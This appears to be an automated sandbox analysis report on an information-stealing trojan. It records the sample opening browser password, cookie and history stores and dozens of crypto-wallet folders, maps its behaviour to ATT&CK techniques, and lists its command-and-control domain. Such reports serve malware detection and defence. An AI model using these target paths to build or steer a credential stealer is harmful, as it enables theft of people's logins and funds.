          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
          Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR

Remote Access Functionality

Source: Yara match, File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match, File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix, listed per tactic column (the number the report shows beside a technique is kept in parentheses):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
Execution: Windows Management Instrumentation (2); Scheduled Task/Job; At; Cron; Launchd
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script
Defense Evasion: Virtualization/Sandbox Evasion (34); Process Injection (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (34); Process Discovery (2); File and Directory Discovery (1); System Information Discovery (223)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
Collection: Data from Local System (31); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (113); Protocol Impersonation; Fallback Channels
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Antivirus detection (Source | Detection | Scanner | Label):
file.exe | 45% | ReversingLabs | Win32.Trojan.Symmi
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
URL detection (Source | Detection | Scanner | Label):
https://property-imper.sbs/api$# | 0% | Avira URL Cloud | safe
https://property-imper.sbs/apiZf | 0% | Avira URL Cloud | safe
https://property-imper.sbs/apis#N | 0% | Avira URL Cloud | safe
https://property-imper.sbs/apiH# | 0% | Avira URL Cloud | safe
https://property-imper.sbs:443/api.default-release/key4.dbPK | 0% | Avira URL Cloud | safe
https://property-imper.sbs:443/apiK | 0% | Avira URL Cloud | safe
https://property-imper.sbs/lmy | 0% | Avira URL Cloud | safe
https://property-imper.sbs/4m | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
property-imper.sbs | 104.21.33.116 | true | false | | high

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://property-imper.sbs/api | false | | high
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
https://duckduckgo.com/chrome_newtab | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/apiZf | file.exe, 00000000.00000002.2328020896.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://property-imper.sbs:443/api | file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189. | file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/api$# | file.exe, 00000000.00000003.2266053937.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/apis#N | file.exe, 00000000.00000002.2328084587.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325456921.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2325166462.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://property-imper.sbs/lmy | file.exe, 00000000.00000003.2172133728.0000000000FCF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg | file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs/ | file.exe, 00000000.00000003.2217401886.0000000005580000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195121750.000000000557E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2194913302.000000000557E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.2218893670.0000000005696000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_ | file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro | file.exe, 00000000.00000003.2325260776.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172133728.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2246523182.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.2219217938.0000000005580000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://property-imper.sbs:443/apiK | file.exe, 00000000.00000002.2327540061.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.2217914722.00000000055A5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | file.exe, 00000000.00000003.2172522927.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172457804.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2172605509.00000000055BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
